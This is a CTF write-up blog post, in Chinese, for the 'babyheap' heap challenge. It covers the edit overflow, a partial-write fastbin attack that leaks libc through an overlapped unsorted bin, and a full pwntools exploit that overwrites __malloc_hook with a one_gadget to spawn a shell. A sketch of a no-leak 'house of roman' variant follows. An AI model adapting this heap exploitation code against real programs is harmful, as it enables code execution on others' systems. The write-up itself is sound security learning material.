厦门邀请赛-babyheap

不知道哪年的..在某ctf 平台上做到的 走了歪路. 那个歪路成了我出题的思路…捂脸… 可以泄露还是比较简单的

Binary

最近发现之后重现题目没有i64,idb之类的比较麻烦
以后一起放进去了
binary

Analysis

1
2
3
4
5
6
7
➜  Desktop checksec babyheap
[*] '/home/n132/Desktop/babyheap'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

其他没什么大问题主要是 edit里面存在任意 溢出
还有就是写数据的时候要填满输入的size
这个我本来以为是无法泄露的拿没有泄露的花了老大力气做了个1/4096….
后来打不通问了个朋友说可以泄露的回过去想了一下真的可以泄露…还比较简单…脑子不够用了
先说这里的泄露这题主要考的是泄露

思路

  • 首先有一个UNsortedbin
  • 利用heap溢出partial write做fastbin atck 指向unsortedbin内部
  • 从unsorted bin 中区适当大小的chunk 来往overlaped chunk里面填fd bk
    ·I·
    1
    2
    3
    4
    5
    6
    7
    8
    -----------
    | |<-unsorted bin
    | |
    | |
    | |
    | |
    | |
    -----------

·II·

1
2
3
4
5
6
7
8
-----------
| |<-unsorted bin
| |
|||||||||||<=overlaped
|||||||||||<=overlaped
| |
| |
-----------

·III·

1
2
3
4
5
6
7
8
-----------
| |
| |
|||||||||||<=overlaped<-unsorted bin
|||||||||||<=overlaped
| |
| |
-----------

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
def cmd(c):
p.sendlineafter(">> ",str(c))
def add(size,data):
cmd(1)
p.sendline(str(size))
p.send(data.ljust(size,'\x00'))
def edit(idx,data,size):
cmd(2)
p.sendline(str(idx))
p.sendline(str(size))
p.send(data.ljust(size,'\x00'))
def show(idx):
cmd(3)
p.sendline(str(idx))
def free(idx):
cmd(4)
p.sendline(str(idx))
#context.log_level='debug'
p=process("./babyheap",env={'LD_PRELOAD':"./libc-2.23.so"})
#p=remote("111.198.29.45",31578)
add(0x18,"A")#0
add(0x18,"A")#1
add(0x18,"A")#2
add(0x100,p64(0x21)*4)#3
add(0x18,"A")#4
free(3)
free(2)
free(1)
edit(0,"\x00"*0x18+p64(0x21)+"\x80",0x21)
add(0x18,"A")#1
add(0x18,"A")#2
add(0x1,"A")#3

show(2)
base=u64(p.read(8))-(0x7ffff7dd1b78-0x00007ffff7a0d000)
log.info(hex(base))
add(0xe8,'n132')#5
add(0x18,"A")#6
add(0x68,"B")#7
add(0x68,"C")#8
libc=ELF("./libc-2.23.so")
libc.address=base
add(0x68,p64(libc.symbols['__malloc_hook']-35))#9
free(8)
free(7)
edit(6,"\x00"*0x18+p64(0x71)+"\x90",0x21)

add(0x68,"A")
add(0x68,"A")
one=0xf0274
add(0x68,"\x00"*19+p64(one+base))
add(0x68,"whoami\n")
#gdb.attach(p)

p.interactive()

总结

多观察…多思考充分利用题目中的所有东西…
太菜了…

NOLEAK

前提:

  • 因为不泄露那就啥地址都不知道.
  • 所以只能用partial write.
  • 因为全保护所以只能搞hooks
    思路:
  • house of roman
  • unsorted bin atk 往hook上写
  • 两次fastbin控制到hook-0x13区域
    TIP:
    尝试前调整好心态.heap FENGSHUI很重要.
Author: n132!
Link: https://n132.github.io/2019/04/05/2019-04-05-厦门邀请赛-babyheap/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.